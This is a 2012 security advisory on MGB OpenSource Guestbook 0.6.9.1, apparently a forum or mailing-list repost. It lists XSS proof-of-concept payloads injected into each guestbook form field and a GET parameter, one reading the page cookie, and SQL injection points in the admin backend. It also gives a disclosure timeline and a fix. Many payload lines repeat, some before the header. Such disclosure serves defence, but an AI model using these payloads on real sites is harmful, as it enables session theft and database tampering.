sent=1&name=test&city=test&email=test (at) local (dot) net [email concealed]&icq='"</style></script><
script>alert(/xss/)</script>&aim=&msn=&hp=http%3A%2F%2F&message=test&tex
tsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email=test (at) local (dot) net [email concealed]&icq=&aim='"</style></scr
ipt><script>alert(/xss/)</script>&msn=&hp=http%3A%2F%2F&message=test&tex
tsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email=test (at) local (dot) net [email concealed]&icq=&aim=&msn=='"</style
></script><script>alert(/xss/)</script>&hp=http%3A%2F%2F&message=test&te
xtsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorscha
u
sent=1&name=test&city=test&email=test (at) local (dot) net [email concealed]&icq=&aim=&msn=&hp='"</st
yle></script><script>alert(/xss/)</script>&message=test&textsize=&textco
lor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email=test (at) local (dot) net [email concealed]&icq='"</style></script><
script>alert(/xss/)</script>&aim=&msn=&hp=http%3A%2F%2F&message=test&tex
tsize=&textcolor=&user_notification=1&user_show_email=1
sent=1&name=test&city=test&email=test (at) local (dot) net [email concealed]&icq=&aim='"</style></scr
ipt><script>alert(/xss/)</script>&msn=&hp=http%3A%2F%2F&message=test&tex
tsize=&textcolor=&user_notification=1&user_show_email=1
sent=1&name=test&city=test&email=test (at) local (dot) net [email concealed]&icq=&aim=&msn=='"</style
></script><script>alert(/xss/)</script>&hp=http%3A%2F%2F&message=test&te
xtsize=&textcolor=&user_notification=1&user_show_email=1
sent=1&name=test&city=test&email=test (at) local (dot) net [email concealed]&icq=&aim=&msn=&hp='"</st
yle></script><script>alert(/xss/)</script>&message=test&textsize=&textco
lor=&user_notification=1&user_show_email=1
Advisory ID: SSCHADV2012-017
Author: Stefan Schurtz
Affected Software: Successfully tested on MGB OpenSource Guestbook 0.6.9.1
Vendor URL: http://www.m-gb.org
Vendor Status: fixed
==========================
Vulnerability Description
==========================
The MGB OpenSource Guestbook is prone to multiple security vulnerabilities
==================
PoC-Exploit
==================
// XSS
# GET
http://[target]/mgb/index.php?p=1'"</script><script>alert(document.cooki
e)</script>
# POST
http://[target]/mgb/newentry.php
sent=1&name='"</style></script><script>alert(/xss/)</script>&city=test&e
mail=test%40local.de&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsi
ze=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city='"</style></script><script>alert(/xss/)</script>&e
mail=test%40local.de&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsi
ze=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email='"</style></script><script>alert(/xss/)
</script>&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcol
or=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email=test (at) local (dot) net [email concealed]&icq='"</style></script><
script>alert(/xss/)</script>&aim=&msn=&hp=http%3A%2F%2F&message=test&tex
tsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email=test (at) local (dot) net [email concealed]&icq=&aim='"</style></scr
ipt><script>alert(/xss/)</script>&msn=&hp=http%3A%2F%2F&message=test&tex
tsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email=test (at) local (dot) net [email concealed]&icq=&aim=&msn=='"</style
></script><script>alert(/xss/)</script>&hp=http%3A%2F%2F&message=test&te
xtsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorscha
u
sent=1&name=test&city=test&email=test (at) local (dot) net [email concealed]&icq=&aim=&msn=&hp='"</st
yle></script><script>alert(/xss/)</script>&message=test&textsize=&textco
lor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name='"</style></script><script>alert(/xss/)</script>&city=test&e
mail=test%40local.de&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsi
ze=&textcolor=&user_notification=1&user_show_email=1&
sent=1&name=test&city='"</style></script><script>alert(/xss/)</script>&e
mail=test%40local.de&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsi
ze=&textcolor=&user_notification=1&user_show_email=1
sent=1&name=test&city=test&email='"</style></script><script>alert(/xss/)
</script>&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcol
or=&user_notification=1&user_show_email=1
sent=1&name=test&city=test&email=test (at) local (dot) net [email concealed]&icq='"</style></script><
script>alert(/xss/)</script>&aim=&msn=&hp=http%3A%2F%2F&message=test&tex
tsize=&textcolor=&user_notification=1&user_show_email=1
sent=1&name=test&city=test&email=test (at) local (dot) net [email concealed]&icq=&aim='"</style></scr
ipt><script>alert(/xss/)</script>&msn=&hp=http%3A%2F%2F&message=test&tex
tsize=&textcolor=&user_notification=1&user_show_email=1
sent=1&name=test&city=test&email=test (at) local (dot) net [email concealed]&icq=&aim=&msn=='"</style
></script><script>alert(/xss/)</script>&hp=http%3A%2F%2F&message=test&te
xtsize=&textcolor=&user_notification=1&user_show_email=1
sent=1&name=test&city=test&email=test (at) local (dot) net [email concealed]&icq=&aim=&msn=&hp='"</st
yle></script><script>alert(/xss/)</script>&message=test&textsize=&textco
lor=&user_notification=1&user_show_email=1
// SQLi (Admin backend)
http://[target]/mgb/admin/admin.php?action=delete&id=[SQLi]&p=1
http://[target]/mgb/admin/admin.php?action=deactivate&id=[SQLi]&p=1
=========
Solution
=========
Upgrade to the latest version 0.6.9.2
====================
Disclosure Timeline
====================
05-Jul-2012 - developer informed
07-Jul-2012 - feedback from developer
15-Jul-2012 - fixed by developer
========
Credits
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References
===========
http://www.darksecurity.de/advisories/2012/SSCHADV2012-017.txt
[ reply ]